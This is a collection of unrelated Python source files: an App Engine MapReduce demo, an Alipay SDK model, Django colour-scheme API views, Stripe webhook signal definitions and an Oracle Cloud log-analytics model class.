# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" This is a sample application that tests the MapReduce API.
It does so by allowing users to upload a zip file containing plaintext files
and perform some kind of analysis upon it. Currently three types of MapReduce
jobs can be run over user-supplied input data: a WordCount MR that reports the
number of occurrences of each word, an Index MR that reports which file(s) each
word in the input corpus comes from, and a Phrase MR that finds statistically
improbable phrases for a given input file (this requires many input files in the
zip file to attain higher accuracies)."""
__author__ = """[email protected] (Mike Aizatsky), [email protected] (Chris
Bunch)"""
# Using opensource naming conventions, pylint: disable=g-bad-name
import datetime
import jinja2
import logging
import re
import urllib
import webapp2
from google.appengine.ext import blobstore
from google.appengine.ext import db
from google.appengine.ext.webapp import blobstore_handlers
from google.appengine.api import app_identity
from google.appengine.api import taskqueue
from google.appengine.api import users
from mapreduce import base_handler
from mapreduce import mapreduce_pipeline
from mapreduce import operation as op
from mapreduce import shuffler
class FileMetadata(db.Model):
"""A helper class that will hold metadata for the user's blobs.
  Specifically, we want to keep track of who uploaded it, where they uploaded it
from (right now they can only upload from their computer, but in the future
urlfetch would be nice to add), and links to the results of their MR jobs. To
enable our querying to scan over our input data, we store keys in the form
'user/date/blob_key', where 'user' is the given user's e-mail address, 'date'
is the date and time that they uploaded the item on, and 'blob_key'
indicates the location in the Blobstore that the item can be found at. '/'
is not the actual separator between these values - we use '..' since it is
an illegal set of characters for an e-mail address to contain.
"""
__SEP = ".."
__NEXT = "./"
owner = db.UserProperty()
filename = db.StringProperty()
uploadedOn = db.DateTimeProperty()
source = db.StringProperty()
blobkey = db.StringProperty()
wordcount_link = db.StringProperty()
index_link = db.StringProperty()
phrases_link = db.StringProperty()
@staticmethod
def getFirstKeyForUser(username):
"""Helper function that returns the first possible key a user could own.
This is useful for table scanning, in conjunction with getLastKeyForUser.
Args:
username: The given user's e-mail address.
Returns:
The internal key representing the earliest possible key that a user could
own (although the value of this key is not able to be used for actual
user data).
"""
return db.Key.from_path("FileMetadata", username + FileMetadata.__SEP)
@staticmethod
def getLastKeyForUser(username):
"""Helper function that returns the last possible key a user could own.
This is useful for table scanning, in conjunction with getFirstKeyForUser.
Args:
username: The given user's e-mail address.
Returns:
The internal key representing the last possible key that a user could
own (although the value of this key is not able to be used for actual
user data).
"""
return db.Key.from_path("FileMetadata", username + FileMetadata.__NEXT)
@staticmethod
def getKeyName(username, date, blob_key):
"""Returns the internal key for a particular item in the database.
Our items are stored with keys of the form 'user/date/blob_key' ('/' is
not the real separator, but __SEP is).
Args:
username: The given user's e-mail address.
date: A datetime object representing the date and time that an input
file was uploaded to this app.
blob_key: The blob key corresponding to the location of the input file
in the Blobstore.
Returns:
The internal key for the item specified by (username, date, blob_key).
"""
sep = FileMetadata.__SEP
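    # Illustrative example (hypothetical values): getKeyName("alice", date, "blob123")
    # returns "alice..<date>..blob123"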
return str(username + sep + str(date) + sep + blob_key)
class IndexHandler(webapp2.RequestHandler):
"""The main page that users will interact with, which presents users with
the ability to upload new data or run MapReduce jobs on their existing data.
"""
template_env = jinja2.Environment(loader=jinja2.FileSystemLoader("templates"),
autoescape=True)
def get(self):
user = users.get_current_user()
username = user.nickname()
first = FileMetadata.getFirstKeyForUser(username)
last = FileMetadata.getLastKeyForUser(username)
q = FileMetadata.all()
q.filter("__key__ >", first)
q.filter("__key__ < ", last)
results = q.fetch(10)
items = [result for result in results]
length = len(items)
bucket_name = app_identity.get_default_gcs_bucket_name()
upload_url = blobstore.create_upload_url("/upload",
gs_bucket_name=bucket_name)
self.response.out.write(self.template_env.get_template("index.html").render(
{"username": username,
"items": items,
"length": length,
"upload_url": upload_url}))
def post(self):
filekey = self.request.get("filekey")
blob_key = self.request.get("blobkey")
if self.request.get("word_count"):
pipeline = WordCountPipeline(filekey, blob_key)
elif self.request.get("index"):
pipeline = IndexPipeline(filekey, blob_key)
else:
pipeline = PhrasesPipeline(filekey, blob_key)
pipeline.start()
self.redirect(pipeline.base_path + "/status?root=" + pipeline.pipeline_id)
def split_into_sentences(s):
"""Split text into list of sentences."""
s = re.sub(r"\s+", " ", s)
s = re.sub(r"[\\.\\?\\!]", "\n", s)
return s.split("\n")
def split_into_words(s):
"""Split a sentence into list of words."""
s = re.sub(r"\W+", " ", s)
s = re.sub(r"[_0-9]+", " ", s)
return s.split()
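# Worked example of the two helpers above:
#   split_into_sentences("Hi there. Bye!") -> ["Hi there", " Bye", ""]
#   split_into_words("Hi there") -> ["Hi", "there"]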
def word_count_map(data):
"""Word count map function."""
(entry, text_fn) = data
text = text_fn()
logging.debug("Got %s", entry.filename)
for s in split_into_sentences(text):
for w in split_into_words(s.lower()):
yield (w, "")
def word_count_reduce(key, values):
"""Word count reduce function."""
yield "%s: %d\n" % (key, len(values))
def index_map(data):
"""Index demo map function."""
(entry, text_fn) = data
text = text_fn()
logging.debug("Got %s", entry.filename)
for s in split_into_sentences(text):
for w in split_into_words(s.lower()):
yield (w, entry.filename)
def index_reduce(key, values):
"""Index demo reduce function."""
yield "%s: %s\n" % (key, list(set(values)))
PHRASE_LENGTH = 4
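# Heuristic for "statistically improbable phrases": a phrase is any run of
# PHRASE_LENGTH consecutive words, and phrases_reduce keeps a phrase for a
# file only when that file accounts for more than half of at least 10 total
# occurrences across the corpus.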
def phrases_map(data):
"""Phrases demo map function."""
(entry, text_fn) = data
text = text_fn()
filename = entry.filename
logging.debug("Got %s", filename)
for s in split_into_sentences(text):
words = split_into_words(s.lower())
if len(words) < PHRASE_LENGTH:
yield (":".join(words), filename)
continue
for i in range(0, len(words) - PHRASE_LENGTH):
yield (":".join(words[i:i+PHRASE_LENGTH]), filename)
def phrases_reduce(key, values):
"""Phrases demo reduce function."""
if len(values) < 10:
return
counts = {}
for filename in values:
counts[filename] = counts.get(filename, 0) + 1
words = re.sub(r":", " ", key)
threshold = len(values) / 2
for filename, count in counts.items():
if count > threshold:
yield "%s:%s\n" % (words, filename)
class WordCountPipeline(base_handler.PipelineBase):
"""A pipeline to run Word count demo.
Args:
blobkey: blobkey to process as string. Should be a zip archive with
text files inside.
"""
def run(self, filekey, blobkey):
logging.debug("filename is %s" % filekey)
bucket_name = app_identity.get_default_gcs_bucket_name()
output = yield mapreduce_pipeline.MapreducePipeline(
"word_count",
"main.word_count_map",
"main.word_count_reduce",
"mapreduce.input_readers.BlobstoreZipInputReader",
"mapreduce.output_writers.GoogleCloudStorageOutputWriter",
mapper_params={
"blob_key": blobkey,
},
reducer_params={
"output_writer": {
"bucket_name": bucket_name,
"content_type": "text/plain",
}
},
shards=16)
yield StoreOutput("WordCount", filekey, output)
class IndexPipeline(base_handler.PipelineBase):
"""A pipeline to run Index demo.
Args:
blobkey: blobkey to process as string. Should be a zip archive with
text files inside.
"""
def run(self, filekey, blobkey):
bucket_name = app_identity.get_default_gcs_bucket_name()
output = yield mapreduce_pipeline.MapreducePipeline(
"index",
"main.index_map",
"main.index_reduce",
"mapreduce.input_readers.BlobstoreZipInputReader",
"mapreduce.output_writers.GoogleCloudStorageOutputWriter",
mapper_params={
"blob_key": blobkey,
},
reducer_params={
"output_writer": {
"bucket_name": bucket_name,
"content_type": "text/plain",
}
},
shards=16)
yield StoreOutput("Index", filekey, output)
class PhrasesPipeline(base_handler.PipelineBase):
"""A pipeline to run Phrases demo.
Args:
blobkey: blobkey to process as string. Should be a zip archive with
text files inside.
"""
def run(self, filekey, blobkey):
bucket_name = app_identity.get_default_gcs_bucket_name()
output = yield mapreduce_pipeline.MapreducePipeline(
"phrases",
"main.phrases_map",
"main.phrases_reduce",
"mapreduce.input_readers.BlobstoreZipInputReader",
"mapreduce.output_writers.GoogleCloudStorageOutputWriter",
mapper_params={
"blob_key": blobkey,
},
reducer_params={
"output_writer": {
"bucket_name": bucket_name,
"content_type": "text/plain",
}
},
shards=16)
yield StoreOutput("Phrases", filekey, output)
class StoreOutput(base_handler.PipelineBase):
"""A pipeline to store the result of the MapReduce job in the database.
Args:
mr_type: the type of mapreduce job run (e.g., WordCount, Index)
encoded_key: the DB key corresponding to the metadata of this job
output: the gcs file path where the output of the job is stored
"""
def run(self, mr_type, encoded_key, output):
logging.debug("output is %s" % str(output))
key = db.Key(encoded=encoded_key)
m = FileMetadata.get(key)
blobstore_filename = "/gs" + output[0]
blobstore_gs_key = blobstore.create_gs_key(blobstore_filename)
url_path = "/blobstore/" + blobstore_gs_key
if mr_type == "WordCount":
m.wordcount_link = url_path
elif mr_type == "Index":
m.index_link = url_path
elif mr_type == "Phrases":
m.phrases_link = url_path
m.put()
class UploadHandler(blobstore_handlers.BlobstoreUploadHandler):
"""Handler to upload data to blobstore."""
def post(self):
source = "uploaded by user"
upload_files = self.get_uploads("file")
blob_key = upload_files[0].key()
name = self.request.get("name")
user = users.get_current_user()
username = user.nickname()
date = datetime.datetime.now()
str_blob_key = str(blob_key)
key = FileMetadata.getKeyName(username, date, str_blob_key)
m = FileMetadata(key_name = key)
m.owner = user
m.filename = name
m.uploadedOn = date
m.source = source
m.blobkey = str_blob_key
m.put()
self.redirect("/")
class DownloadHandler(blobstore_handlers.BlobstoreDownloadHandler):
"""Handler to download blob by blobkey."""
def get(self, key):
key = str(urllib.unquote(key)).strip()
logging.debug("key is %s" % key)
blob_info = blobstore.BlobInfo.get(key)
self.send_blob(blob_info)
app = webapp2.WSGIApplication(
[
('/', IndexHandler),
('/upload', UploadHandler),
(r'/blobstore/(.*)', DownloadHandler),
],
debug=True)
|
the-stack_0_19789 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayMarketingCashlessticketTemplateCreateModel(object):
def __init__(self):
self._amount = None
self._brand_name = None
self._extension_info = None
self._group_code = None
self._memo = None
self._notify_uri = None
self._out_biz_no = None
self._publish_end_time = None
self._publish_start_time = None
self._rule_conf = None
self._ticket_available_time = None
self._ticket_description = None
self._ticket_quantity = None
self._ticket_type = None
self._ticket_valid_period = None
self._total_amount = None
@property
def amount(self):
return self._amount
@amount.setter
def amount(self, value):
self._amount = value
@property
def brand_name(self):
return self._brand_name
@brand_name.setter
def brand_name(self, value):
self._brand_name = value
@property
def extension_info(self):
return self._extension_info
@extension_info.setter
def extension_info(self, value):
self._extension_info = value
@property
def group_code(self):
return self._group_code
@group_code.setter
def group_code(self, value):
self._group_code = value
@property
def memo(self):
return self._memo
@memo.setter
def memo(self, value):
self._memo = value
@property
def notify_uri(self):
return self._notify_uri
@notify_uri.setter
def notify_uri(self, value):
self._notify_uri = value
@property
def out_biz_no(self):
return self._out_biz_no
@out_biz_no.setter
def out_biz_no(self, value):
self._out_biz_no = value
@property
def publish_end_time(self):
return self._publish_end_time
@publish_end_time.setter
def publish_end_time(self, value):
self._publish_end_time = value
@property
def publish_start_time(self):
return self._publish_start_time
@publish_start_time.setter
def publish_start_time(self, value):
self._publish_start_time = value
@property
def rule_conf(self):
return self._rule_conf
@rule_conf.setter
def rule_conf(self, value):
self._rule_conf = value
@property
def ticket_available_time(self):
return self._ticket_available_time
@ticket_available_time.setter
def ticket_available_time(self, value):
self._ticket_available_time = value
@property
def ticket_description(self):
return self._ticket_description
@ticket_description.setter
def ticket_description(self, value):
self._ticket_description = value
@property
def ticket_quantity(self):
return self._ticket_quantity
@ticket_quantity.setter
def ticket_quantity(self, value):
self._ticket_quantity = value
@property
def ticket_type(self):
return self._ticket_type
@ticket_type.setter
def ticket_type(self, value):
self._ticket_type = value
@property
def ticket_valid_period(self):
return self._ticket_valid_period
@ticket_valid_period.setter
def ticket_valid_period(self, value):
self._ticket_valid_period = value
@property
def total_amount(self):
return self._total_amount
@total_amount.setter
def total_amount(self, value):
self._total_amount = value
def to_alipay_dict(self):
params = dict()
if self.amount:
if hasattr(self.amount, 'to_alipay_dict'):
params['amount'] = self.amount.to_alipay_dict()
else:
params['amount'] = self.amount
if self.brand_name:
if hasattr(self.brand_name, 'to_alipay_dict'):
params['brand_name'] = self.brand_name.to_alipay_dict()
else:
params['brand_name'] = self.brand_name
if self.extension_info:
if hasattr(self.extension_info, 'to_alipay_dict'):
params['extension_info'] = self.extension_info.to_alipay_dict()
else:
params['extension_info'] = self.extension_info
if self.group_code:
if hasattr(self.group_code, 'to_alipay_dict'):
params['group_code'] = self.group_code.to_alipay_dict()
else:
params['group_code'] = self.group_code
if self.memo:
if hasattr(self.memo, 'to_alipay_dict'):
params['memo'] = self.memo.to_alipay_dict()
else:
params['memo'] = self.memo
if self.notify_uri:
if hasattr(self.notify_uri, 'to_alipay_dict'):
params['notify_uri'] = self.notify_uri.to_alipay_dict()
else:
params['notify_uri'] = self.notify_uri
if self.out_biz_no:
if hasattr(self.out_biz_no, 'to_alipay_dict'):
params['out_biz_no'] = self.out_biz_no.to_alipay_dict()
else:
params['out_biz_no'] = self.out_biz_no
if self.publish_end_time:
if hasattr(self.publish_end_time, 'to_alipay_dict'):
params['publish_end_time'] = self.publish_end_time.to_alipay_dict()
else:
params['publish_end_time'] = self.publish_end_time
if self.publish_start_time:
if hasattr(self.publish_start_time, 'to_alipay_dict'):
params['publish_start_time'] = self.publish_start_time.to_alipay_dict()
else:
params['publish_start_time'] = self.publish_start_time
if self.rule_conf:
if hasattr(self.rule_conf, 'to_alipay_dict'):
params['rule_conf'] = self.rule_conf.to_alipay_dict()
else:
params['rule_conf'] = self.rule_conf
if self.ticket_available_time:
if hasattr(self.ticket_available_time, 'to_alipay_dict'):
params['ticket_available_time'] = self.ticket_available_time.to_alipay_dict()
else:
params['ticket_available_time'] = self.ticket_available_time
if self.ticket_description:
if hasattr(self.ticket_description, 'to_alipay_dict'):
params['ticket_description'] = self.ticket_description.to_alipay_dict()
else:
params['ticket_description'] = self.ticket_description
if self.ticket_quantity:
if hasattr(self.ticket_quantity, 'to_alipay_dict'):
params['ticket_quantity'] = self.ticket_quantity.to_alipay_dict()
else:
params['ticket_quantity'] = self.ticket_quantity
if self.ticket_type:
if hasattr(self.ticket_type, 'to_alipay_dict'):
params['ticket_type'] = self.ticket_type.to_alipay_dict()
else:
params['ticket_type'] = self.ticket_type
if self.ticket_valid_period:
if hasattr(self.ticket_valid_period, 'to_alipay_dict'):
params['ticket_valid_period'] = self.ticket_valid_period.to_alipay_dict()
else:
params['ticket_valid_period'] = self.ticket_valid_period
if self.total_amount:
if hasattr(self.total_amount, 'to_alipay_dict'):
params['total_amount'] = self.total_amount.to_alipay_dict()
else:
params['total_amount'] = self.total_amount
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayMarketingCashlessticketTemplateCreateModel()
if 'amount' in d:
o.amount = d['amount']
if 'brand_name' in d:
o.brand_name = d['brand_name']
if 'extension_info' in d:
o.extension_info = d['extension_info']
if 'group_code' in d:
o.group_code = d['group_code']
if 'memo' in d:
o.memo = d['memo']
if 'notify_uri' in d:
o.notify_uri = d['notify_uri']
if 'out_biz_no' in d:
o.out_biz_no = d['out_biz_no']
if 'publish_end_time' in d:
o.publish_end_time = d['publish_end_time']
if 'publish_start_time' in d:
o.publish_start_time = d['publish_start_time']
if 'rule_conf' in d:
o.rule_conf = d['rule_conf']
if 'ticket_available_time' in d:
o.ticket_available_time = d['ticket_available_time']
if 'ticket_description' in d:
o.ticket_description = d['ticket_description']
if 'ticket_quantity' in d:
o.ticket_quantity = d['ticket_quantity']
if 'ticket_type' in d:
o.ticket_type = d['ticket_type']
if 'ticket_valid_period' in d:
o.ticket_valid_period = d['ticket_valid_period']
if 'total_amount' in d:
o.total_amount = d['total_amount']
return o
|
the-stack_0_19791 | import json
import os
import random
from django.contrib import auth
from django.contrib.admin.views.decorators import staff_member_required
from django.db.models import Count
from django.http import JsonResponse, HttpResponse
from django.views.decorators.http import require_http_methods
from colorish.decorators import json_request, require_login
from main.models import Scheme
from . import generator
@require_http_methods(['GET'])
def me(request):
if request.user.is_authenticated:
return JsonResponse({
'username': request.user.username,
})
else:
return JsonResponse(None, safe=False)
@require_http_methods(['POST'])
@json_request
def login(request):
user = auth.authenticate(username=request.json['username'], password=request.json['password'])
if user is None:
return JsonResponse(False, safe=False)
else:
auth.login(request, user)
return JsonResponse(True, safe=False)
@require_http_methods(['POST'])
@json_request
def generate(request):
user = request.user if request.user.is_authenticated else None
n = generator.get_network(request.json['networkId'])
schemes_count = Scheme.objects.filter(network_id=n['id']).count()
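    # Weighted coin flip: never serve from the cache until this network has over
    # 1000 stored schemes; beyond that, the cache is increasingly favored as the count grows.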
use_cache = random.choices([True, False], weights=[max(0, schemes_count - 1000), 1000])[0]
if use_cache:
i = random.randint(0, schemes_count - 1)
scheme = Scheme.objects.filter(network_id=n['id']).order_by('id')[i]
else:
generated = generator.generate(n)
scheme = Scheme(
view_count=1,
time=generated['time'],
network_id=generated['network_id'],
quality=generated['quality'],
)
scheme.set_colors(generated['colors'])
scheme.save()
return JsonResponse(scheme.as_dict(user=user))
@staff_member_required
@require_http_methods(['GET'])
def bulk_generate(request, network_id):
for i in range(20):
generated = generator.generate(network_id=network_id)
        scheme = Scheme(view_count=1, time=generated['time'], network_id=generated['network_id'], quality=generated['quality'])
scheme.set_colors(generated['colors'])
scheme.save()
return HttpResponse('success')
@require_http_methods(['GET'])
def popular(request, network_id=None):
user = request.user if request.user.is_authenticated else None
schemes = Scheme.objects.annotate(liked_users_count=Count('liked_users')).order_by('-liked_users_count', '-id')
ret = []
if network_id:
schemes = schemes.filter(network_id=network_id)
for scheme in schemes[:9]:
ret.append(scheme.as_dict(user=user))
return JsonResponse(ret, safe=False)
@require_http_methods(['GET'])
def networks(request):
ret = []
for networkId in os.listdir('state-dict'):
ret.append({
'networkId': networkId,
'schemeCount': Scheme.objects.filter(network_id=networkId).count(),
})
return JsonResponse(ret, safe=False)
@require_http_methods(['GET'])
def network(request, network_id):
with open('state-dict/' + network_id + '/log.json') as json_file:
ret = {
'networkId': network_id,
'schemeCount': Scheme.objects.filter(network_id=network_id).count(),
'log': json.load(json_file),
}
return JsonResponse(ret)
@require_http_methods(['GET'])
def scheme_detail(request, scheme_id):
user = request.user if request.user.is_authenticated else None
s = Scheme.objects.get(id=scheme_id)
s.view_count += 1
s.save()
return JsonResponse(s.as_dict(user=user))
@require_login
@require_http_methods(['GET'])
def toggle_like(request, scheme_id):
scheme = Scheme.objects.get(id=scheme_id)
u = request.user
liked = scheme.liked_users.filter(id=u.id).exists()
if liked:
scheme.liked_users.remove(u)
else:
scheme.liked_users.add(u)
return JsonResponse({
'liked_count': scheme.like_count(),
'liked': not liked,
})
@require_login
@require_http_methods(['GET'])
def likes(request):
user = request.user if request.user.is_authenticated else None
ret = [s.as_dict(user) for s in request.user.likes.all()]
return JsonResponse(ret, safe=False)
|
the-stack_0_19792 | """
signals are sent for each event Stripe sends to the app
Stripe docs for Webhooks: https://stripe.com/docs/webhooks
"""
from django.dispatch import Signal
webhook_processing_error = Signal(providing_args=["data", "exception"])
# A signal for each Event type. See https://stripe.com/docs/api/events/types
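# Example usage (hypothetical handler name): subscribe to one event type with
#   WEBHOOK_SIGNALS["charge.succeeded"].connect(handle_charge_succeeded)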
WEBHOOK_SIGNALS = dict(
[
(hook, Signal(providing_args=["event"]))
for hook in [
# Update this by copy-pasting the "enabled_events" enum values from
# https://raw.githubusercontent.com/stripe/openapi/master/openapi/spec3.json
"account.application.authorized",
"account.application.deauthorized",
"account.external_account.created",
"account.external_account.deleted",
"account.external_account.updated",
"account.updated",
"application_fee.created",
"application_fee.refund.updated",
"application_fee.refunded",
"balance.available",
"capability.updated",
"charge.captured",
"charge.dispute.closed",
"charge.dispute.created",
"charge.dispute.funds_reinstated",
"charge.dispute.funds_withdrawn",
"charge.dispute.updated",
"charge.expired",
"charge.failed",
"charge.pending",
"charge.refund.updated",
"charge.refunded",
"charge.succeeded",
"charge.updated",
"checkout.session.async_payment_failed",
"checkout.session.async_payment_succeeded",
"checkout.session.completed",
"coupon.created",
"coupon.deleted",
"coupon.updated",
"credit_note.created",
"credit_note.updated",
"credit_note.voided",
"customer.created",
"customer.deleted",
"customer.discount.created",
"customer.discount.deleted",
"customer.discount.updated",
"customer.source.created",
"customer.source.deleted",
"customer.source.expiring",
"customer.source.updated",
"customer.subscription.created",
"customer.subscription.deleted",
"customer.subscription.pending_update_applied",
"customer.subscription.pending_update_expired",
"customer.subscription.trial_will_end",
"customer.subscription.updated",
"customer.tax_id.created",
"customer.tax_id.deleted",
"customer.tax_id.updated",
"customer.updated",
"file.created",
"invoice.created",
"invoice.deleted",
"invoice.finalization_failed",
"invoice.finalized",
"invoice.marked_uncollectible",
"invoice.paid",
"invoice.payment_action_required",
"invoice.payment_failed",
"invoice.payment_succeeded",
"invoice.sent",
"invoice.upcoming",
"invoice.updated",
"invoice.voided",
"invoiceitem.created",
"invoiceitem.deleted",
"invoiceitem.updated",
"issuing_authorization.created",
"issuing_authorization.request",
"issuing_authorization.updated",
"issuing_card.created",
"issuing_card.updated",
"issuing_cardholder.created",
"issuing_cardholder.updated",
"issuing_dispute.closed",
"issuing_dispute.created",
"issuing_dispute.funds_reinstated",
"issuing_dispute.submitted",
"issuing_dispute.updated",
"issuing_transaction.created",
"issuing_transaction.updated",
"mandate.updated",
"order.created",
"order.payment_failed",
"order.payment_succeeded",
"order.updated",
"order_return.created",
"payment_intent.amount_capturable_updated",
"payment_intent.canceled",
"payment_intent.created",
"payment_intent.payment_failed",
"payment_intent.processing",
"payment_intent.requires_action",
"payment_intent.succeeded",
"payment_method.attached",
"payment_method.automatically_updated",
"payment_method.detached",
"payment_method.updated",
"payout.canceled",
"payout.created",
"payout.failed",
"payout.paid",
"payout.updated",
"person.created",
"person.deleted",
"person.updated",
"plan.created",
"plan.deleted",
"plan.updated",
"price.created",
"price.deleted",
"price.updated",
"product.created",
"product.deleted",
"product.updated",
"promotion_code.created",
"promotion_code.updated",
"radar.early_fraud_warning.created",
"radar.early_fraud_warning.updated",
"recipient.created",
"recipient.deleted",
"recipient.updated",
"reporting.report_run.failed",
"reporting.report_run.succeeded",
"reporting.report_type.updated",
"review.closed",
"review.opened",
"setup_intent.canceled",
"setup_intent.created",
"setup_intent.requires_action",
"setup_intent.setup_failed",
"setup_intent.succeeded",
"sigma.scheduled_query_run.created",
"sku.created",
"sku.deleted",
"sku.updated",
"source.canceled",
"source.chargeable",
"source.failed",
"source.mandate_notification",
"source.refund_attributes_required",
"source.transaction.created",
"source.transaction.updated",
"subscription_schedule.aborted",
"subscription_schedule.canceled",
"subscription_schedule.completed",
"subscription_schedule.created",
"subscription_schedule.expiring",
"subscription_schedule.released",
"subscription_schedule.updated",
"tax_rate.created",
"tax_rate.updated",
"topup.canceled",
"topup.created",
"topup.failed",
"topup.reversed",
"topup.succeeded",
"transfer.created",
"transfer.failed",
"transfer.paid",
"transfer.reversed",
"transfer.updated",
# deprecated (no longer in events_types list) - TODO can be deleted?
"checkout_beta.session_succeeded",
"issuer_fraud_record.created",
"payment_intent.requires_capture",
"payment_method.card_automatically_updated",
"issuing_dispute.created",
"issuing_dispute.updated",
"issuing_settlement.created",
"issuing_settlement.updated",
# special case? - TODO can be deleted?
"ping",
]
]
)
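# Usage sketch: connecting a receiver to one of the per-event signals above
# (the import path `djstripe.signals` is an assumption about this module).
#
# from django.dispatch import receiver
# from djstripe.signals import WEBHOOK_SIGNALS
#
# @receiver(WEBHOOK_SIGNALS["charge.succeeded"])
# def on_charge_succeeded(sender, event, **kwargs):
#     ...  # react to the Stripe event payload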
|
the-stack_0_19793 | # coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class UpdateScheduledTaskDetails(object):
"""
The details for updating a schedule task.
"""
#: A constant which can be used with the kind property of a UpdateScheduledTaskDetails.
#: This constant has a value of "ACCELERATION"
KIND_ACCELERATION = "ACCELERATION"
#: A constant which can be used with the kind property of a UpdateScheduledTaskDetails.
#: This constant has a value of "STANDARD"
KIND_STANDARD = "STANDARD"
def __init__(self, **kwargs):
"""
        Initializes a new UpdateScheduledTaskDetails object with values from keyword arguments. This class has the following subclasses and if you are using this class as input
        to service operations then you should favor using a subclass over the base class:
* :class:`~oci.log_analytics.models.UpdateStandardTaskDetails`
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param kind:
The value to assign to the kind property of this UpdateScheduledTaskDetails.
Allowed values for this property are: "ACCELERATION", "STANDARD"
:type kind: str
:param display_name:
The value to assign to the display_name property of this UpdateScheduledTaskDetails.
:type display_name: str
:param freeform_tags:
The value to assign to the freeform_tags property of this UpdateScheduledTaskDetails.
:type freeform_tags: dict(str, str)
:param defined_tags:
The value to assign to the defined_tags property of this UpdateScheduledTaskDetails.
:type defined_tags: dict(str, dict(str, object))
:param schedules:
The value to assign to the schedules property of this UpdateScheduledTaskDetails.
:type schedules: list[oci.log_analytics.models.Schedule]
"""
self.swagger_types = {
'kind': 'str',
'display_name': 'str',
'freeform_tags': 'dict(str, str)',
'defined_tags': 'dict(str, dict(str, object))',
'schedules': 'list[Schedule]'
}
self.attribute_map = {
'kind': 'kind',
'display_name': 'displayName',
'freeform_tags': 'freeformTags',
'defined_tags': 'definedTags',
'schedules': 'schedules'
}
self._kind = None
self._display_name = None
self._freeform_tags = None
self._defined_tags = None
self._schedules = None
@staticmethod
def get_subtype(object_dictionary):
"""
Given the hash representation of a subtype of this class,
use the info in the hash to return the class of the subtype.
"""
type = object_dictionary['kind']
if type == 'STANDARD':
return 'UpdateStandardTaskDetails'
else:
return 'UpdateScheduledTaskDetails'
@property
def kind(self):
"""
**[Required]** Gets the kind of this UpdateScheduledTaskDetails.
Discriminator.
Allowed values for this property are: "ACCELERATION", "STANDARD"
:return: The kind of this UpdateScheduledTaskDetails.
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""
Sets the kind of this UpdateScheduledTaskDetails.
Discriminator.
:param kind: The kind of this UpdateScheduledTaskDetails.
:type: str
"""
allowed_values = ["ACCELERATION", "STANDARD"]
if not value_allowed_none_or_none_sentinel(kind, allowed_values):
raise ValueError(
"Invalid value for `kind`, must be None or one of {0}"
.format(allowed_values)
)
self._kind = kind
@property
def display_name(self):
"""
Gets the display_name of this UpdateScheduledTaskDetails.
A user-friendly name that is changeable and that does not have to be unique.
        Format: (a leading alphanumeric, followed by zero or more
        alphanumerics, underscores, spaces, backslashes, or hyphens in any order).
No trailing spaces allowed.
:return: The display_name of this UpdateScheduledTaskDetails.
:rtype: str
"""
return self._display_name
@display_name.setter
def display_name(self, display_name):
"""
Sets the display_name of this UpdateScheduledTaskDetails.
A user-friendly name that is changeable and that does not have to be unique.
        Format: (a leading alphanumeric, followed by zero or more
        alphanumerics, underscores, spaces, backslashes, or hyphens in any order).
No trailing spaces allowed.
:param display_name: The display_name of this UpdateScheduledTaskDetails.
:type: str
"""
self._display_name = display_name
@property
def freeform_tags(self):
"""
Gets the freeform_tags of this UpdateScheduledTaskDetails.
Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.
Example: `{\"bar-key\": \"value\"}`
:return: The freeform_tags of this UpdateScheduledTaskDetails.
:rtype: dict(str, str)
"""
return self._freeform_tags
@freeform_tags.setter
def freeform_tags(self, freeform_tags):
"""
Sets the freeform_tags of this UpdateScheduledTaskDetails.
Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only.
Example: `{\"bar-key\": \"value\"}`
:param freeform_tags: The freeform_tags of this UpdateScheduledTaskDetails.
:type: dict(str, str)
"""
self._freeform_tags = freeform_tags
@property
def defined_tags(self):
"""
Gets the defined_tags of this UpdateScheduledTaskDetails.
Defined tags for this resource. Each key is predefined and scoped to a namespace.
Example: `{\"foo-namespace\": {\"bar-key\": \"value\"}}`
:return: The defined_tags of this UpdateScheduledTaskDetails.
:rtype: dict(str, dict(str, object))
"""
return self._defined_tags
@defined_tags.setter
def defined_tags(self, defined_tags):
"""
Sets the defined_tags of this UpdateScheduledTaskDetails.
Defined tags for this resource. Each key is predefined and scoped to a namespace.
Example: `{\"foo-namespace\": {\"bar-key\": \"value\"}}`
:param defined_tags: The defined_tags of this UpdateScheduledTaskDetails.
:type: dict(str, dict(str, object))
"""
self._defined_tags = defined_tags
@property
def schedules(self):
"""
Gets the schedules of this UpdateScheduledTaskDetails.
Schedules may be updated for task types SAVED_SEARCH and PURGE.
Note there may only be a single schedule for SAVED_SEARCH and PURGE scheduled tasks.
:return: The schedules of this UpdateScheduledTaskDetails.
:rtype: list[oci.log_analytics.models.Schedule]
"""
return self._schedules
@schedules.setter
def schedules(self, schedules):
"""
Sets the schedules of this UpdateScheduledTaskDetails.
Schedules may be updated for task types SAVED_SEARCH and PURGE.
Note there may only be a single schedule for SAVED_SEARCH and PURGE scheduled tasks.
:param schedules: The schedules of this UpdateScheduledTaskDetails.
:type: list[oci.log_analytics.models.Schedule]
"""
self._schedules = schedules
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
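# Usage sketch: building an update payload via the kwargs-driven initializer
# (all field values below are illustrative).
#
# details = UpdateScheduledTaskDetails(
#     kind="STANDARD",
#     display_name="nightly-purge",
#     freeform_tags={"env": "dev"},
# )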
|
the-stack_0_19797 | # -*- mode:python; coding:utf-8 -*-
# Copyright (c) 2020 IBM Corp. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
